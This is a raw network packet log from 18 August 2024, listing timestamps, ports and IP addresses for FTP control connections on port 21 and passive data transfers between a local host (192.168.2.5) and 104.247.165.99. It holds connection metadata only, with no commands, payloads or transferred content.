Aug 18, 2024 18:30:29.720576048 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.720738888 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:29.725645065 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.946521044 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:29.946682930 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:29.951576948 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:30.172161102 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:30.172461987 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:30.177295923 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:30.398494959 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:30.399099112 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:30.403927088 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:30.403990984 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:30.404067993 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:30.408881903 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.031451941 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.031806946 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.037045002 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037058115 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037075043 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037085056 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037112951 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.037126064 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037136078 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037147045 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.037166119 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037174940 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037194967 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.037208080 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.037240982 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037272930 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.037303925 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.037377119 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042097092 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042121887 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042164087 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042193890 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042258024 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042268991 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042299986 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042309999 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042330027 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042412043 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042427063 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042500019 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042511940 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042524099 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042535067 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042617083 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.042624950 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.042714119 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.047081947 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047185898 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047205925 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.047303915 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.047348022 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047395945 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047430038 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047584057 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047637939 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047693968 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047763109 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047808886 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.047867060 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.052069902 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.052150011 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.052412033 CEST	62340	54710	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.052493095 CEST	54710	62340	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.136636019 CEST	54711	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.142239094 CEST	21	54711	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.142374992 CEST	54711	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.143767118 CEST	54711	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.148688078 CEST	21	54711	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.148845911 CEST	54711	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.160630941 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:31.526422977 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:31.615063906 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:51.180192947 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:51.185192108 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:51.405646086 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:51.408782005 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:51.413825035 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:51.413999081 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:51.416189909 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:51.421022892 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.040934086 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.041229963 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.046272039 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046289921 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046303988 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046324015 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046336889 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046355009 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.046420097 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.046503067 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046551943 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.046602964 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046618938 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046643019 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046653986 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.046655893 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.046690941 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.046713114 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051260948 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051318884 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051372051 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051386118 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051419973 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051430941 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051454067 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051465034 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051479101 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051521063 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051552057 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051598072 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051650047 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051763058 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051785946 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051800966 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051821947 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051867962 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.051985025 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.051997900 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.052135944 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056277990 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056325912 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056435108 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056552887 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056566954 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056693077 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.056874037 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.057446957 CEST	65356	54712	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:52.057496071 CEST	54712	65356	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:52.082319021 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:53.313438892 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:53.314029932 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:53.314167023 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:53.314193010 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:53.315840006 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:54.757297039 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:54.762501955 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:54.984229088 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:54.988656998 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:54.993797064 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:54.994004965 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:54.994147062 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:54.999104977 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.614424944 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.614658117 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.619724989 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.619757891 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.619786978 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.619864941 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.619924068 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.619951963 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.619986057 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.620002031 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.620031118 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.620059013 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.620070934 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.620088100 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.620096922 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.620121956 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.620124102 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.620184898 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628462076 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628516912 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628540993 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628568888 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628580093 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628602028 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628618002 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628649950 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628669977 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628699064 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628716946 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628751040 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628829002 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628856897 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628884077 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628885984 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628920078 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628923893 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628948927 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.628948927 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.628976107 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.629065037 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.629277945 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.635680914 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.637422085 CEST	58684	54713	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:55.637471914 CEST	54713	58684	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:55.660450935 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:56.077661991 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:56.129189014 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.108545065 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.113615036 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.336074114 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.336509943 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.341528893 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.341608047 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.341660023 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.346457005 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.775007963 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.780148029 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.784646988 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.952266932 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.952840090 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.957962990 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958009005 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958039045 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958067894 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958125114 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958153009 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958158016 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.958180904 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958199024 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.958208084 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958235979 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958267927 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.958275080 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.963179111 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963231087 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963241100 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.963391066 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963419914 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963462114 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.963665009 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963741064 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963843107 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963870049 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.963880062 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.967533112 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:58.968178034 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.968230963 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.968421936 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.968450069 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.968498945 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.968929052 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.969000101 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.972528934 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.972738028 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.972786903 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.973155022 CEST	53201	54714	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:58.979470015 CEST	54714	53201	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:59.007200003 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:59.404707909 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:59.405026913 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:59.409883022 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:59.415445089 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:59.457357883 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:59.621162891 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:59.624773979 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:59.629705906 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:59.903948069 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:30:59.904099941 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:30:59.909421921 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.119587898 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.119718075 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:00.124596119 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.334731102 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.334928989 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:00.340029001 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.550632000 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.550786972 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:00.555824995 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.766277075 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.770770073 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:00.775765896 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:00.778983116 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:00.778990984 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:00.783994913 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.412650108 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.412946939 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.421333075 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421363115 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421401978 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421456099 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.421585083 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421610117 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421622038 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421703100 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421715975 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421727896 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421741009 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.421772957 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.421849012 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.426749945 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.426764011 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.426779985 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.426791906 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.426826954 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.426868916 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.426934004 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.427031040 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.427463055 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.427469015 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.427630901 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.427702904 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.427867889 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.433094025 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.434309959 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.434324980 CEST	49430	54716	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.434756041 CEST	54716	49430	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.457333088 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:01.901299000 CEST	21	54715	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:01.941713095 CEST	54715	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:22.203300953 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:22.208399057 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:22.474817991 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:22.475316048 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:22.480335951 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:22.480415106 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:22.480463982 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:22.485486031 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.119225025 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.119558096 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.124556065 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124579906 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124588966 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124598026 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124627113 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.124653101 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.124684095 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124694109 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124702930 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124763012 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124772072 CEST	54717	57612	192.168.2.5	104.247.165.99
